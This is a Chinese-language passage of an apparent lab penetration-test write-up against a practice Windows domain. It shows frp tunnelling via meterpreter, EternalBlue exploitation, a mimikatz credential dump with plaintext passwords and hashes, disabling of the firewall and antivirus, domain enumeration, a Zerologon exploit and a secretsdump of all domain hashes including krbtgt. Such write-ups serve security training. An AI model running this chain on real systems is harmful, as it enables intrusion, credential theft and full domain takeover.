[*] 扫描结束,耗时: 11.7454549s

扫描到了两个内网ip,本机的10.10.10.80和10.10.10.10这两个,而且这两个存在永恒之蓝漏洞。
10.10.10.10ip是属于DC机的,是一台windows2012 R2机器。
虽然WEB这台机器存在永恒之蓝,但是WEB机器打开了防火墙和360安全卫士。
那么我们只需要用本地的流量打进去即可。可以使用frpc进行内网穿透。

3、frpc内网穿透

meterpreter > upload frpc.exe C:/frpc.exe
[*] Uploading  : /root/lianxi/frpc.exe -> C:/frpc.exe
[*] Uploaded 8.00 MiB of 9.91 MiB (80.76%): /root/lianxi/frpc.exe -> C:/frpc.exe
[*] Uploaded 9.91 MiB of 9.91 MiB (100.0%): /root/lianxi/frpc.exe -> C:/frpc.exe
[*] Completed  : /root/lianxi/frpc.exe -> C:/frpc.exe
meterpreter > upload frpc.exe C:/frpc.ini
[*] Uploading  : /root/lianxi/frpc.exe -> C:/frpc.ini
[*] Uploaded 8.00 MiB of 9.91 MiB (80.76%): /root/lianxi/frpc.exe -> C:/frpc.ini
[*] Uploaded 9.91 MiB of 9.91 MiB (100.0%): /root/lianxi/frpc.exe -> C:/frpc.ini
[*] Completed  : /root/lianxi/frpc.exe -> C:/frpc.ini
meterpreter >


meterpreter > cat frpc.ini
[common]
server_addr = 192.168.16.128
server_port = 7000

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 2222


修改好配置文件,我们继续。

开启监听

┌──(root㉿ru)-[~/tools/neiwang/frpc_exe/frpc]
└─# ls     
frpc  frpc_full.ini  frpc.ini  frps  frps_full.ini  frps.ini  LICENSE
                                                                                                                                        
┌──(root㉿ru)-[~/tools/neiwang/frpc_exe/frpc]
└─# ./frps -c ./frps.ini
2023/11/15 17:41:29 [I] [service.go:130] frps tcp listen on 0.0.0.0:7000
2023/11/15 17:41:29 [I] [root.go:210] Start frps success


meterpreter > execute -f frpc.exe -c frpc.ini
Process 1124 created.
Channel 30 created.


┌──(root㉿ru)-[~/tools/neiwang/frpc_exe/frpc]
└─# ./frps -c ./frps.ini
2023/11/15 18:09:13 [I] [service.go:130] frps tcp listen on 0.0.0.0:7000
2023/11/15 18:09:13 [I] [root.go:210] Start frps success
2023/11/15 18:34:52 [I] [service.go:319] client login info: ip [192.168.16.80:65505] version [0.28.0] hostname [] os [windows] arch [amd64]
2023/11/15 18:34:52 [I] [proxy.go:217] [46f557daf981c6b6] [socks_proxy] tcp proxy listen port [2222]
2023/11/15 18:34:52 [I] [control.go:335] [46f557daf981c6b6] new proxy [socks_proxy] success

4、ms17-010

setg proxies socks5:127.0.0.1:2222    (frpc.ini配置文件里也要改为2222)   (kali proxychains4.conf配置文件里,也要添加  socks5 192.168.16.80:2222)


search ms17-010
use 0
set rhosts 10.10.10.80
setg ReverseAllowProxy true  (全局使用代理)
exploit

[*] Started reverse TCP handler on 192.168.16.128:4444
[*] 10.10.10.80:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.80:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.80:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.80:445 - The target is vulnerable.
[*] 10.10.10.80:445 - Connecting to target for exploitation.
[+] 10.10.10.80:445 - Connection established for exploitation.
[+] 10.10.10.80:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.80:445 - CORE raw buffer dump (51 bytes)
[*] 10.10.10.80:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.10.10.80:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 10.10.10.80:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.10.10.80:445 - 0x00000030  6b 20 31                                         k 1
[+] 10.10.10.80:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.80:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.80:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.80:445 - Starting non-paged pool grooming
[+] 10.10.10.80:445 - Sending SMBv2 buffers
[+] 10.10.10.80:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.80:445 - Sending final SMBv2 buffers.
[*] 10.10.10.80:445 - Sending last fragment of exploit packet!
[*] 10.10.10.80:445 - Receiving response from exploit packet
[+] 10.10.10.80:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.80:445 - Sending egg to corrupted connection.
[*] 10.10.10.80:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.16.80
[+] 10.10.10.80:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.80:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.80:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 3 opened (192.168.16.128:4444 -> 192.168.16.80:65533) at 2023-11-15 19:03:18 +0800

抓取密码

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain  LM                   NTLM                 SHA1
--------       ------  --                   ----                 ----
Administrator  DE1AY   568dbd0a449fc18b5e3  a57b337d9b973245b58  e9b1c4ac6e506624299
                       4749e73fa9c64        a09442ff15e2a        5e9413bd4b7d8e69ab8
                                                                 da
WEB$           DE1AY                        08aa1d4f839e2adec8f  2b629061c855db93004
                                            7fa68129f4641        fecade9514eb9969a84
                                                                 50
mssql          DE1AY   f67ce55ac831223dc18  161cff084477fe596a5  d669f3bccf14bf77d64
                       7b8085fe1d9df        db81874498a24        667ec65aae32d2d1003
                                                                 9d

wdigest credentials
===================

Username       Domain  Password
--------       ------  --------
(null)         (null)  (null)
Administrator  DE1AY   Rx@322596
WEB$           DE1AY   41 07 81 30 92 20 7f 23 ce 45 2f 02 9d 7f 15 1c d9 2d 37 d2 9
                       3 5e 7d 88 5c 8c c5 4a fa 0b 69 82 12 97 d0 95 ec c5 42 bc 74
                        a5 d4 fb 94 bf cb 72 50 07 47 ac 76 7c 8c f5 b5 ef de c6 22
                       0c ed 8b 66 0e b6 4c 3e 7b 59 c7 f3 24 2c 04 f6 65 a9 21 16 d
                       3 02 63 38 3f d7 0c f8 e5 ba f2 d0 3e 7d ef 13 4d c2 0b 10 79
                        24 b3 02 8f db 69 89 3c 79 a3 31 1c f9 ec 5c e6 c6 0f cd 93
                       38 2c ea 97 a6 4f 93 44 e5 66 39 15 a3 96 6c 1a fd c7 18 23 2
                       6 15 97 f6 a2 e8 02 79 9d 50 fc 6a f8 fa 26 3f 01 f3 b8 fe b7
                        7c 26 dc f8 19 65 82 79 c7 02 43 b1 b5 99 e2 59 ab b2 d7 c2
                       06 fa f6 2e 7e 4b a7 2f 63 f8 3a 63 22 11 b6 be fd 5e 7a 1f 2
                       c 30 89 fb 4b 7a 8a 48 74 a8 a1 74 0f b5 f3 ec 46 8a a4 86 fa
                        2a f8 c0 89 90 37 16 28 36 f2 db b0 3f e2 e8 37
mssql          DE1AY   1qaz@WSX

tspkg credentials
=================

Username       Domain  Password
--------       ------  --------
Administrator  DE1AY   Rx@322596
WEB$           DE1AY   41 07 81 30 92 20 7f 23 ce 45 2f 02 9d 7f 15 1c d9 2d 37 d2 9
                       3 5e 7d 88 5c 8c c5 4a fa 0b 69 82 12 97 d0 95 ec c5 42 bc 74
                        a5 d4 fb 94 bf cb 72 50 07 47 ac 76 7c 8c f5 b5 ef de c6 22
                       0c ed 8b 66 0e b6 4c 3e 7b 59 c7 f3 24 2c 04 f6 65 a9 21 16 d
                       3 02 63 38 3f d7 0c f8 e5 ba f2 d0 3e 7d ef 13 4d c2 0b 10 79
                        24 b3 02 8f db 69 89 3c 79 a3 31 1c f9 ec 5c e6 c6 0f cd 93
                       38 2c ea 97 a6 4f 93 44 e5 66 39 15 a3 96 6c 1a fd c7 18 23 2
                       6 15 97 f6 a2 e8 02 79 9d 50 fc 6a f8 fa 26 3f 01 f3 b8 fe b7
                        7c 26 dc f8 19 65 82 79 c7 02 43 b1 b5 99 e2 59 ab b2 d7 c2
                       06 fa f6 2e 7e 4b a7 2f 63 f8 3a 63 22 11 b6 be fd 5e 7a 1f 2
                       c 30 89 fb 4b 7a 8a 48 74 a8 a1 74 0f b5 f3 ec 46 8a a4 86 fa
                        2a f8 c0 89 90 37 16 28 36 f2 db b0 3f e2 e8 37
mssql          DE1AY   1qaz@WSX

kerberos credentials
====================

Username       Domain     Password
--------       ------     --------
(null)         (null)     (null)
WEB$           de1ay.com  41 07 81 30 92 20 7f 23 ce 45 2f 02 9d 7f 15 1c d9 2d 37 d
                          2 93 5e 7d 88 5c 8c c5 4a fa 0b 69 82 12 97 d0 95 ec c5 42
                           bc 74 a5 d4 fb 94 bf cb 72 50 07 47 ac 76 7c 8c f5 b5 ef
                          de c6 22 0c ed 8b 66 0e b6 4c 3e 7b 59 c7 f3 24 2c 04 f6 6
                          5 a9 21 16 d3 02 63 38 3f d7 0c f8 e5 ba f2 d0 3e 7d ef 13
                           4d c2 0b 10 79 24 b3 02 8f db 69 89 3c 79 a3 31 1c f9 ec
                          5c e6 c6 0f cd 93 38 2c ea 97 a6 4f 93 44 e5 66 39 15 a3 9
                          6 6c 1a fd c7 18 23 26 15 97 f6 a2 e8 02 79 9d 50 fc 6a f8
                           fa 26 3f 01 f3 b8 fe b7 7c 26 dc f8 19 65 82 79 c7 02 43
                          b1 b5 99 e2 59 ab b2 d7 c2 06 fa f6 2e 7e 4b a7 2f 63 f8 3
                          a 63 22 11 b6 be fd 5e 7a 1f 2c 30 89 fb 4b 7a 8a 48 74 a8
                           a1 74 0f b5 f3 ec 46 8a a4 86 fa 2a f8 c0 89 90 37 16 28
                          36 f2 db b0 3f e2 e8 37
administrator  DE1AY.COM  Rx@322596
mssql          DE1AY.COM  1qaz@WSX
web$           DE1AY.COM  41 07 81 30 92 20 7f 23 ce 45 2f 02 9d 7f 15 1c d9 2d 37 d
                          2 93 5e 7d 88 5c 8c c5 4a fa 0b 69 82 12 97 d0 95 ec c5 42
                           bc 74 a5 d4 fb 94 bf cb 72 50 07 47 ac 76 7c 8c f5 b5 ef
                          de c6 22 0c ed 8b 66 0e b6 4c 3e 7b 59 c7 f3 24 2c 04 f6 6
                          5 a9 21 16 d3 02 63 38 3f d7 0c f8 e5 ba f2 d0 3e 7d ef 13
                           4d c2 0b 10 79 24 b3 02 8f db 69 89 3c 79 a3 31 1c f9 ec
                          5c e6 c6 0f cd 93 38 2c ea 97 a6 4f 93 44 e5 66 39 15 a3 9
                          6 6c 1a fd c7 18 23 26 15 97 f6 a2 e8 02 79 9d 50 fc 6a f8
                           fa 26 3f 01 f3 b8 fe b7 7c 26 dc f8 19 65 82 79 c7 02 43
                          b1 b5 99 e2 59 ab b2 d7 c2 06 fa f6 2e 7e 4b a7 2f 63 f8 3
                          a 63 22 11 b6 be fd 5e 7a 1f 2c 30 89 fb 4b 7a 8a 48 74 a8
                           a1 74 0f b5 f3 ec 46 8a a4 86 fa 2a f8 c0 89 90 37 16 28
                          36 f2 db b0 3f e2 e8 37


meterpreter >



5、get WEB

proxychains rdesktop 10.10.10.80 -u DE1AY/administrator -p Rx@322596

如果登不上去,尝试登录到DE1AY这个域内。


我们先关闭防火墙,然后再退出360。做完这一切,第一台靶机算是拿下了。

6、内网信息收集

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 WEB
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows 用户
Registered Organization:
Product ID:                00477-001-0000421-84103
Original Install Date:     2019/9/8, 19:01:04
System Boot Time:          2023/11/15, 11:59:24
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 80 Stepping 0 AuthenticAMD ~3194 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 2020/11/12
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             zh-cn;Chinese (China)
Input Locale:              zh-cn;Chinese (China)
Time Zone:                 (UTC+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory:     2,047 MB
Available Physical Memory: 913 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 2,691 MB
Virtual Memory: In Use:    1,404 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    de1ay.com
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2999226
                           [02]: KB958488
                           [03]: KB976902
Network Card(s):           2 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: 本地连接
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.16.80
                                 [02]: fe80::3d9b:497f:88e7:8c87
                           [02]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: 本地连接 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.80
                                 [02]: fe80::903c:bc23:7fc5:c94e


C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : WEB
   Primary Dns Suffix  . . . . . . . : de1ay.com
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : de1ay.com

Ethernet adapter ▒▒▒▒▒▒▒ 2:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   Physical Address. . . . . . . . . : 00-0C-29-DA-7F-8C
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::903c:bc23:7fc5:c94e%13(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.10.80(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.1
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
   DNS Servers . . . . . . . . . . . : 10.10.10.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter ▒▒▒▒▒▒▒:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-DA-7F-82
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::3d9b:497f:88e7:8c87%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.16.80(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.16.1
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
   DNS Servers . . . . . . . . . . . : 10.10.10.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{AD80CD23-D97F-4814-A715-9248D845EA0F}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{D7E14072-49B9-45D3-BA8C-7955E6146CC2}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes


C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            de1ay                    Guest
The command completed with one or more errors.


C:\Windows\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        ▒▒▒▒Ա▒Լ▒▒▒▒/▒▒▒в▒▒▒▒▒▒Ƶ▒▒▒ȫ▒▒▒▒Ȩ

Members

-------------------------------------------------------------------------------
Administrator
de1ay
DE1AY\Domain Admins
The command completed successfully.

综上可知目标Web服务器主机的操作系统为Windows Server 2008,具有两个网卡分别连通192.168.16.1/24和10.10.10.1/24两个网段。


7、域内信息收集

C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain de1ay.com.


User accounts for \\DC.de1ay.com

-------------------------------------------------------------------------------
Administrator            de1ay                    Guest
krbtgt                   mssql


C:\Windows\system32>net time /domain
net time /domain
Current time at \\DC.de1ay.com is 2023/11/15 19:36:34

The command completed successfully.


C:\Windows\system32>ping DC.de1ay.com
ping DC.de1ay.com

Pinging DC.de1ay.com [10.10.10.10] with 32 bytes of data:
Reply from 10.10.10.10: bytes=32 time<1ms TTL=128
Reply from 10.10.10.10: bytes=32 time<1ms TTL=128
Reply from 10.10.10.10: bytes=32 time<1ms TTL=128
Reply from 10.10.10.10: bytes=32 time<1ms TTL=128

Ping statistics for 10.10.10.10:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\Windows\system32>


C:\Windows\system32>net group /domain  //查看域内工作组
net group /domain
The request will be processed at a domain controller for domain de1ay.com.


Group Accounts for \\DC.de1ay.com

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

C:\Windows\system32>net group "domain computers" /domain  //查看域内主机
net group "domain computers" /domain
The request will be processed at a domain controller for domain de1ay.com.

Group name     Domain Computers
Comment        ▒▒▒뵽▒▒▒е▒▒▒▒й▒▒▒վ▒ͷ▒▒▒▒▒

Members

-------------------------------------------------------------------------------
PC$                      WEB$
The command completed successfully.


C:\Windows\system32>net group "domain controllers" /domain  //查看域控制器
net group "domain controllers" /domain
The request will be processed at a domain controller for domain de1ay.com.

Group name     Domain Controllers
Comment        ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

Members

-------------------------------------------------------------------------------
DC$
The command completed successfully.


C:\Windows\system32>net group "Enterprise Admins" /domain  //查看域管理员
net group "Enterprise Admins" /domain
The request will be processed at a domain controller for domain de1ay.com.

Group name     Enterprise Admins
Comment        ▒▒ҵ▒▒ָ▒▒ϵͳ▒▒▒▒Ա

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.


从收集的信息可知,目标主机所在的网络存在域环境,域名为de1ay.com,存在两台域主机WEB和PC,域控制器为DC.de1ay.com,主机名为DC,域管理员为Administrato。

CVE-2020-1472漏洞利用

CVE-2020-1472是是一个windows域控中严重的远程权限提升漏洞。

影响版本:Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016 (Server Core installation)Windows Server 2019Windows Server 2019 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)

1、漏洞检测

┌──(root㉿ru)-[~/lianxi/CVE-2020-1472-master/CVE-2020-1472]
└─# proxychains python3 zerologon_tester.py dc 10.10.10.10
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Performing authentication attempts...
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
.....
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK

Success! DC can be fully compromised by a Zerologon attack.

通过poc进行检测。返回success,说明存在该漏洞!

2、漏洞利用

┌──(root㉿ru)-[~/lianxi/CVE-2020-1472-master/CVE-2020-1472_1/CVE-2020-1472]
└─# proxychains python cve-2020-1472-exploit.py dc 10.10.10.10
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Performing authentication attempts...
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49158  ...  OK
=================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

将域控制器的密码重置。

3、impacket-secretsdump

proxychains 是一个用于通过代理服务器进行网络连接的工具,impacket-secretsdump 是 Impacket 工具包中的一个工具,用于从目标系统中提取 NTLM 密码哈希。

在您的命令中,proxychains 被用来在进行网络连接时使用代理服务器。
impacket-secretsdump 的参数中,在 de1ay.com/dc\$ 中的 de1ay.com 应该是目标域控制器的名称,
dc\$ 是指您要查询的目标域控制器的名称,@10.10.10.10 是指目标域控制器的 IP 地址,-no-pass 表示在提取密码哈希时不使用密码。


┌──(root㉿ru)-[~/lianxi/CVE-2020-1472-master/CVE-2020-1472_1/CVE-2020-1472]
└─# proxychains impacket-secretsdump de1ay.com/dc\$@10.10.10.10 -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:2222  ...  10.10.10.10:49155  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a57b337d9b973245b58a09442ff15e2a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::
de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
de1ay.com\mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
PC$:1105:aad3b435b51404eeaad3b435b51404ee:d617fccb791e24db381d38f5e5f8fc1f:::
WEB$:1603:aad3b435b51404eeaad3b435b51404ee:08aa1d4f839e2adec8f7fa68129f4641:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ecb931667a6f389ddbc24cead028a619a9ed881d4b627d7af3a742162af3af91
Administrator:aes128-cts-hmac-sha1-96:90b5a19a098a5bd9db87269d9dd64173
Administrator:des-cbc-md5:b50e5792bc315494
krbtgt:aes256-cts-hmac-sha1-96:42e65a58c000dab8d353b1ff2bee93383f27f0966767afa8c1f32fc51122d118
krbtgt:aes128-cts-hmac-sha1-96:5eb13d2a0e1f4980c3e3810d5da3da4f
krbtgt:des-cbc-md5:79c8dc79fe467552
de1ay:aes256-cts-hmac-sha1-96:22df3e763a8d931afea3c8ca499d7d9b7474248b2bf69deac58418f5c6ac899d
de1ay:aes128-cts-hmac-sha1-96:d0f0c418eb1a4c4a13227ed06b56a8fc
de1ay:des-cbc-md5:5b375d8a1016d613
de1ay.com\mssql:aes256-cts-hmac-sha1-96:6dd445adefa385cc6484e2a8c8952be5da579a3664395d3d729c7e577a8b8009
de1ay.com\mssql:aes128-cts-hmac-sha1-96:047129868012d63377c7f3ee61a16999
de1ay.com\mssql:des-cbc-md5:94bf7f5476298957
DC$:aes256-cts-hmac-sha1-96:29f6a21d200df44d9da2c97116366221413e9df069b0b18280edda219be2bf5e
DC$:aes128-cts-hmac-sha1-96:51d30bc397120a95fa66c429dbf9c010
DC$:des-cbc-md5:04f40d04da3df154
PC$:aes256-cts-hmac-sha1-96:f06fd2149fc6f24dc6a9e793769203f8376224d6c026b6ba1c99f8952263664f
PC$:aes128-cts-hmac-sha1-96:01b696a67cbeb37067421eb769fbc79d
PC$:des-cbc-md5:4a92256d1c6bd34a
WEB$:aes256-cts-hmac-sha1-96:c651a07963e3226c45a008e60160a93076c28a33ab880ee0f5c2a76b6456c7d4
WEB$:aes128-cts-hmac-sha1-96:3f97b9c863d40aef4fb57be6a3deb3a1
WEB$:des-cbc-md5:9dd5b3bae9b64afb
[*] Cleaning up...

导出所有域内用户的密码凭证!

管理员账号密码

Administrator:500:aad3b435b51404eeaad3b435b51404ee:a57b337d9b973245b58a09442ff15e2a:::

得到了域控制器管理员的密码哈希值!

4、impacket-wmiexec

impacket-wmiexec 是 Impacket 工具包中的一个工具,用于在目标远程 Windows 主机上执行命令。
它利用 Windows 管理规范接口 (WMI) 来与远程主机进行通信,并且可以在目标系统上执行命令,而不需要在目标系统上生成任何可疑的文件

┌──(root㉿ru)-[~/lianxi/CVE-2020-1472-master/CVE-2020-1472_1/CVE-2020-1472]
